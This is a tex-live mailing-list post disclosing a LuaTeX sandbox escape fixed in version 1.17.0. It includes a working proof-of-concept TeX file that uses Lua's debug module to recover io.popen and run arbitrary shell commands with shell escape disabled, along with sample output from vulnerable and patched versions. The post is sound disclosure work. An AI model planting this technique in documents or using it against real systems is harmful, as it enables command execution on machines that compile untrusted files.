More info about LuaTeX 1.17.0 (security update)

Max Chernoff mseven at telus.net
Mon May 22 12:31:27 CEST 2023 

Hi all,

A few weeks ago, Luigi and the TeX Live team released LuaTeX 1.17.0. In
the announcement email, Karl was initially pretty vague:

> FYI: some issues have been found in luatex (obscure ways to work around
> some security features; thanks to Max Chernoff).  Luigi has committed
> fixes to the sources, and we are rebuilding now. The new luatex version
> is 1.17.0. All four luatex binaries (luatex luahbtex luajitex luajithbtex)
> are affected.

Enough time has passed, so I'll share some more details now.

Through some trickery with the debug module, any document compiled with
older versions of LuaTeX (1.04--1.16.1) can execute arbitrary shell
commands, even with shell escape completely disabled. Vulnerable
versions were included in TeX Live 2017--2023 and MiKTeX 2.9.6300--23.4;
updated versions of TeX Live 2023 and MiKTeX 23.5 include the fixed
1.17.0 version.

Here's a test document:

    % shell-escape-test.tex
    \directlua{
        local function get_upvalue(func, name)
            local nups = debug.getinfo(func).nups

            for i = 1, nups do
                local current, value = debug.getupvalue(func, i)
                if current == name then
                    return value
                end
            end
        end

        local outer = get_upvalue(io.popen, "popen")
        local popen = get_upvalue(outer or io.popen, "io_popen")

        print(popen(arg[rawlen(arg)]):read("*a"))
    }
    \csname@@end\endcsname
    \end

If you're using a vulnerable version of LuaTeX, then the output will
look something like this:

   $ lualatex shell-escape-test.tex "sh -c 'echo @@@VULNERABLE@@@'"
   This is LuaHBTeX, Version 1.16.0 (TeX Live 2023)
   restricted system commands enabled.
   (./shell-escape-test.tex
   LaTeX2e <2022-11-01> patch level 1
   L3 programming layer <2023-04-20>@@@VULNERABLE@@@
   [...]

If you're using a safe/fixed version, then you'll see this:

   $ luatex shell-escape-test.tex "sh -c 'echo @@@VULNERABLE@@@'"
   This is LuaTeX, Version 1.17.0 (TeX Live 2023)
    restricted system commands enabled.
   (./shell-escape-test.tex[\directlua]:1: attempt to call a nil value (local 'popen')
   [...]

This issue affects all operating systems/architectures, and all LuaTeX
formats except for ConTeXt. Further details are available at:

   https://tug.org/~mseven/luatex.html

Feel free to reply if you have any questions.

Thanks,
-- Max

More information about the tex-live mailing list.